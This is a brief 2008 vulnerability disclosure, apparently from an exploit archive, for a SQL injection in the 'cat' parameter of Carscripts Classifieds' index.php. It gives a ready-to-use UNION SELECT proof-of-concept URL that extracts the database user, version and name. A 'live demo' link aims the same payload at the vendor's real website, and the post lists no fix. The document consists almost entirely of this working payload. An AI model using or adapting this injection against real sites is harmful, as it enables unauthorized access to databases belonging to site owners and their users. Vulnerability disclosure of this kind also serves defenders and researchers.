Carscripts Classifieds (index.php cat) Remote SQL Injection Vulnerability

2008-06-18 00:00:00

Carscripts Classifieds Sql INjection

By Stack
Home v4-team.com
###########################################
[+] : you can see the Result in 'Title'
[+] : Open the source page to see the result
###########################################
poc : http://site.co.il/index.php?cat=-1/**/UNION/**/SELECT/**/concat(char(58),user(),version(),database()),2,3/*

live demo
http://www.carscripts.com/cars/index.php?cat=-1/**/UNION/**/SELECT/**/concat(char(58),user(),version(),database()),2,3/*

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.